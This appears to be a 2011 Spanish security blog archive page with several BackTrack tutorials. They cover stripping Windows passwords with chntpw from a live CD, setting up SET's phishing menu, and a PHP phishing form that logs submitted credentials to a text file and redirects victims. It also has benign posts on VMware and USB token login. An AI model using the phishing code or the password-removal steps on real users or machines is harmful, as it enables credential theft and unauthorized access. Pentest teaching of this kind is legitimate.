Archivo para 27 marzo 2011

Quitar o resetear contraseña de Windows con chntpw en Backtrack

CHNTPW (Change NT Password), es una utilidad de Linux, diseñado para sobreescribir, resetear, cambiar o modificar passwords de las cuentas de usarios Windows, esta herramienta viene por defecto en Backtrack 4 r2, sino se la puede descargar e instalar en la distribución Linux de su preferencia.

Para quitar o cambiar la contraseña de algún usuario de una máquina Windows, procedemos de la siguiente manera:

– Arrancamos el equipo Windows a   traves del CD Live con la distribución BAcktrack (o la que tenga instalada chntpw)

– Una vez iniciado el sistema backtrack desde el CD Live, abrimos la consola y realizamos los siguientes pasos:

– Creamos una carpeta/directorio, con cualquier nombre, por ejemplo Windows7, con el siguiente comando:

# mkdir /media/Windows7

En mi caso, he creado un directorio con el nombre Windows7 en el directorio /media/

– Montar la partición Windows en el Backtrack:

# mount -t ntfs-3g /dev/sda2 /media/Windows7

Explicación breve:

mount -> comando para montar la partición

-t ntfs-3g -> El sistema de archivos de nuestra partición Windows, en este caso, NTFS

/dev/sda2 -> Dispositivo en el que está nuestra partición Windows

/media/Windows7 -> Directorio que creamos en el paso anterior, donde vamos a montar la partición Windows

– Nos ubicamos dentro de dicho directorio:

# cd /media/Windows7

– Ahora accedemos al directorio donde se encuentra el SAM SYSTEM de Windows que es donde se almacenan las contraseñas de los usuarios, ubicada en /Windows/System32/config:

# cd /media/Windows7/Windows/System32/config

– Estando en esta ubicación, procedemos a ejecutar el chntpw, utilizando el siguiente comando:

# /pentest/password/chntpw/chtnpw -l SAM SYSTEM

Aquí, nos mostrará el listado de usuarios del sistema.

– Ahora nos ubicamos en el usuario del sistema que querramos quitar la contraseña de la siguiente manera:

# /pentest/password/chntpw/chtnpw -u <Usuario> SAM SYSTEM

En el mensaje que nos muestra le damos la orden que no, ingresando la n

– En esta parte se muestran las opciones que tiene chntpw para actuar en el usuario seleccionado, usamos la opción 1 para quitar el password

– Guardar los cambios?? Ponemos [y]es

– Finalmente reiniciamos el sistema e ingresamos a Windows, se podrá observar que se puede ingresar sin poner contraseña del usuario que le borramos la contraseña

It’s all….

Anuncios

Instalando VMWare Workstation 7 en OpenSuse 11.4

Al fín, luego de varios intentos y un par de malas noches, he logrado instalar VMware Workstation 7 en OpenSuse 11.4

Para la correcta instalación y que te evites un poco de disgustos al instalar esto, te recomiendo sigas estos pasos con los que he podido instalar:

Instaladores y archivos necesarios:

Descargamos el instalador de VMware para Linux: VMware-Workstation-Full-7.1.3-324285.i386.bundle

Son necesarios también los siguientes archivos, descargarlos y ubicarlos dentro de un mismo directorio:

vmware-7.1.3-2.6.37-rc5.patch

patch-modules_v62-opensuse.sh

Instalación:

Sigue leyendo

Phishing + robo de contraseñas con SET (Social Engineer Toolkit)

SET (Social Engineer Toolkit), se trata de un kit de herramientas especialmente diseñado para realizar ataques avanzados contra el elemento humano. Este conjunto de herramientas rápidamente se ha constituido en una herramienta estandard en el arsenal de los penetration testers.

Fué escrito por David Kennedy (Rel1K). Los ataques construidos con este toolkit son diseñados para ser lanzado contra una persona u organización durante un test de penetración. Forma parte del kit de herramientas de Backtrack.

Configuración:

pentest/exploits/SET#nano config/set_config

Nos fijamos que estén configuradas, al menos, las siguientes opciones:

METASPLOIT_PATH=/opt/metasploit3/msf3
ETTERCAP=ON
ETTERCAP_INTERFACE=eth0
ETTERCAP_PATH=/usr/share/ettercap
WEBATTACK_EMAIL=ON
AUTO_DETECT=ON
SELF_SIGNED_APPLET=ON

Ahora, ejecutamos SET:

pentest/exploits/SET# ./set

Se presenta el siguiente menú:

Select from the menu:

1.  Spear-Phishing Attack Vectors
2.  Website Attack Vectors
3.  Infectious Media Generator
4.  Create a Payload and Listener
5.  Mass Mailer Attack
6.  Teensy USB HID Attack Vector
7.  SMS Spoofing Attack Vector
8.  Third Party Modules
9.  Update the Metasploit Framework
10. Update the Social-Engineer Toolkit
11. Help, Credits, and About
12. Exit the Social-Engineer Toolkit

Escojemos la opción: 2

Sigue leyendo

Formulario sencillo para Phishing…

El phishing, conocido ataque de la fase de Gathering Information, en el que se le presenta a un usuario una página falsa para que haga el ingreso de sus datos, y sin su conocimiento estos datos son transferidos/enviados al atacante.

En este post, se hace mención a este tipo de ataque de una forma básica. Y se plantea el siguiente escenario:

Una vez seleccionada la página objetivo/victima a “falsear”, se hace una copia exacta de la misma, pero la misma incluye un formulario en php que toma los datos ingresados y los almacena en un archivo .txt. Una vez realizado esto, subir la página a un servidor web local (dentro de la red), para que sea enviado a los usuarios dentro de la red.

Archivos necesarios:

Lo que necesitamos por ahora es el código php que será el encargado de leer los datos ingresados y enviarlos a un .txt. Abrimos cualquier editor de texto y pegamos el siguiente código y le damos cualquier nombre, por ejemplo validar.php

<?php
$fichero = “infousers.txt”;
$handle = fopen($fichero, “a+”);
foreach($_POST as $user => $pass)
{
fwrite($handle, $user);
fwrite($handle, “=”);
fwrite($handle, $vpass);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);

header(“Location: http://www.google.com&#8221;);

exit;
?>

Básicamente, lo que hacemos en este código es:

Sigue leyendo

Autenticación en un equipo GNU/Linux usando USB como token

Para autenticarnos en un equipo GNU/Linux, a más de la contraseña del usuario, también puedes utilizar tu USB como token, como medida adicional para proteger el ingreso a tu equipo Linux o bien utilizar ambas medidas, de una manera sencilla y económica:
El Linux utilizado es Backtrack 4 r2, y una memoria USB común y corriente.

Paquetes necesarios a instalar:

Mediante consola podemos instalar los siguientes paquetes:

#apt-get install libpam-usb pamusb-tools

Ahora, debemos conectar nuestra memoria USB y la agregamos de la siguiente forma:

#pamusb-conf –add-device token
Añadir dispositivo USB
Añadir dispositivo USB

Se nos muestra un resumen del dispositivo agregado, que será utilizada como token.
El siguiente paso es agregar el usuario al token del a siguiente manera:

#pamusb-conf –add-user tuusuario

Finalmente se modifica el archivo /etc/pam.d/common-auth, añadiendo la siguiente entrada al archivo:

auth sufficient pam_usb.so

si se quiere utilizar la USB para la autenticación

o

auth required pam_usb.so

si se quiere utilizar ambas medidas para la autenticación, es decir, el ingreso al sistema a través del password del usuario y conjuntamente con la memoria USB montada.

Tomado de: http://www.rinconinformatico.net/usando-una-memoria-usb-como-token-para-autenticarnos-en-una-maquina-gnulinux